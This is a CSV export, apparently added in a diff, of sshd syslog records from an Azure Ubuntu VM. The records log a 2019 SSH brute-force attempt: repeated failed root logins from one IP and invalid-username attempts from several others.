+13684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:12,UbuntuDevEnv,2019-06-26 04:45:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:14,UbuntuDevEnv,2019-06-26 04:45:14,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 21305 ssh2,422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,21305,,
+13686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:28,UbuntuDevEnv,2019-06-26 04:45:27,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 21305 ssh2 [preauth],422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,21305,,
+13687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:28,UbuntuDevEnv,2019-06-26 04:45:27,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:28,UbuntuDevEnv,2019-06-26 04:45:27,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 21305 ssh2],422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,21305,,
+13689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:28,UbuntuDevEnv,2019-06-26 04:45:27,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:28,UbuntuDevEnv,2019-06-26 04:45:27,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 21305: Too many authentication failures [preauth],422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,21305,,
+13691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:31,UbuntuDevEnv,2019-06-26 04:45:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:32,UbuntuDevEnv,2019-06-26 04:45:32,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27233 ssh2,545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27233,,
+13693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:37,UbuntuDevEnv,2019-06-26 04:45:34,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27233 ssh2,545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27233,,
+13694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:37,UbuntuDevEnv,2019-06-26 04:45:36,auth,UbuntuDevEnv,info,Invalid user db2 from 5.135.161.72 port 35150,576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2,5.135.161.7,35150,,
+13695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:37,UbuntuDevEnv,2019-06-26 04:45:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:37,UbuntuDevEnv,2019-06-26 04:45:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:38,UbuntuDevEnv,2019-06-26 04:45:37,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27233 ssh2,545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27233,,
+13698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:38,UbuntuDevEnv,2019-06-26 04:45:38,auth,UbuntuDevEnv,info,Failed password for invalid user db2 from 5.135.161.72 port 35150 ssh2,576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2,5.135.161.7,35150,,
+13699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:38,UbuntuDevEnv,2019-06-26 04:45:38,auth,UbuntuDevEnv,info,Disconnected from invalid user db2 5.135.161.72 port 35150 [preauth],576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2,5.135.161.7,35150,,
+13700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:38,UbuntuDevEnv,2019-06-26 04:45:38,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 35150:11: Bye Bye [preauth],576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,35150,,
+13701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:40,UbuntuDevEnv,2019-06-26 04:45:40,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27233 ssh2,545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27233,,
+13702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:43,UbuntuDevEnv,2019-06-26 04:45:43,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27233 ssh2,545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27233,,
+13703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:44,UbuntuDevEnv,2019-06-26 04:45:43,auth,UbuntuDevEnv,info,Invalid user P@ssw9rd from 95.216.195.95 port 59598,596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,P,95.216.195.9,59598,,
+13704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:44,UbuntuDevEnv,2019-06-26 04:45:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:44,UbuntuDevEnv,2019-06-26 04:45:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:45,UbuntuDevEnv,2019-06-26 04:45:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27233 ssh2,545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27233,,
+13707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:45,UbuntuDevEnv,2019-06-26 04:45:45,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:45,UbuntuDevEnv,2019-06-26 04:45:45,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 27233: Too many authentication failures [preauth],545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,27233,,
+13709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:45,UbuntuDevEnv,2019-06-26 04:45:45,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:45,UbuntuDevEnv,2019-06-26 04:45:45,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 27233 ssh2 [preauth],545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27233,,
+13711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:45,UbuntuDevEnv,2019-06-26 04:45:45,auth,UbuntuDevEnv,info,Failed password for invalid user P@ssw9rd from 95.216.195.95 port 59598 ssh2,596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,P,95.216.195.9,59598,,
+13712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:45,UbuntuDevEnv,2019-06-26 04:45:45,auth,UbuntuDevEnv,info,Disconnected from invalid user P@ssw9rd 95.216.195.95 port 59598 [preauth],596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,P,95.216.195.9,59598,,
+13713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:45,UbuntuDevEnv,2019-06-26 04:45:45,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 59598:11: Bye Bye [preauth],596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,59598,,
+13714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:48,UbuntuDevEnv,2019-06-26 04:45:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:50,UbuntuDevEnv,2019-06-26 04:45:49,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 32859 ssh2,613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32859,,
+13716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:01,UbuntuDevEnv,2019-06-26 04:46:00,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 32859 ssh2],613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32859,,
+13717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:01,UbuntuDevEnv,2019-06-26 04:46:00,auth,UbuntuDevEnv,info,Invalid user cliente from 177.23.90.10 port 43688,655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cliente,177.23.90.1,43688,,
+13718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:01,UbuntuDevEnv,2019-06-26 04:46:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:01,UbuntuDevEnv,2019-06-26 04:46:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+13720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:03,UbuntuDevEnv,2019-06-26 04:46:02,auth,UbuntuDevEnv,info,Failed password for invalid user cliente from 177.23.90.10 port 43688 ssh2,655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cliente,177.23.90.1,43688,,
+13721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:03,UbuntuDevEnv,2019-06-26 04:46:02,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 43688:11: Bye Bye [preauth],655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,43688,,
+13722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:03,UbuntuDevEnv,2019-06-26 04:46:02,auth,UbuntuDevEnv,info,Disconnected from invalid user cliente 177.23.90.10 port 43688 [preauth],655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cliente,177.23.90.1,43688,,
+13723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:03,UbuntuDevEnv,2019-06-26 04:46:02,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 32859: Too many authentication failures [preauth],613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,32859,,
+13724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:03,UbuntuDevEnv,2019-06-26 04:46:02,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 32859 ssh2 [preauth],613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32859,,
+13725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:03,UbuntuDevEnv,2019-06-26 04:46:02,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 32859 ssh2,613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32859,,
+13726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:03,UbuntuDevEnv,2019-06-26 04:46:02,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:03,UbuntuDevEnv,2019-06-26 04:46:02,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:03,UbuntuDevEnv,2019-06-26 04:46:03,auth,UbuntuDevEnv,info,Invalid user avahi-autoipd from 196.41.208.238 port 13330,669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avahi,196.41.208.2,13330,,
+13729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:03,UbuntuDevEnv,2019-06-26 04:46:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+13730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:03,UbuntuDevEnv,2019-06-26 04:46:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:05,UbuntuDevEnv,2019-06-26 04:46:05,auth,UbuntuDevEnv,info,Failed password for invalid user avahi-autoipd from 196.41.208.238 port 13330 ssh2,669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avahi,196.41.208.2,13330,,
+13732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:06,UbuntuDevEnv,2019-06-26 04:46:05,auth,UbuntuDevEnv,info,Disconnected from invalid user avahi-autoipd 196.41.208.238 port 13330 [preauth],669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avahi,196.41.208.2,13330,,
+13733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:06,UbuntuDevEnv,2019-06-26 04:46:05,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 13330:11: Bye Bye [preauth],669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,13330,,
+13734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:06,UbuntuDevEnv,2019-06-26 04:46:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:08,UbuntuDevEnv,2019-06-26 04:46:07,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 38457 ssh2,682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,38457,,
+13736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:19,UbuntuDevEnv,2019-06-26 04:46:19,auth,UbuntuDevEnv,info,Invalid user jira from 200.6.188.38 port 16062,739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jira,200.6.188.3,16062,,
+13737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:19,UbuntuDevEnv,2019-06-26 04:46:18,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 38457 ssh2],682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,38457,,
+13738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:19,UbuntuDevEnv,2019-06-26 04:46:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:19,UbuntuDevEnv,2019-06-26 04:46:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:21,UbuntuDevEnv,2019-06-26 04:46:21,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 38457: Too many authentication failures [preauth],682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,38457,,
+13741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:21,UbuntuDevEnv,2019-06-26 04:46:21,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 38457 ssh2 [preauth],682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,38457,,
+13742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:21,UbuntuDevEnv,2019-06-26 04:46:21,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 38457 ssh2,682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,38457,,
+13743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:46:21,UbuntuDevEnv,2019-06-26 04:46:21,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
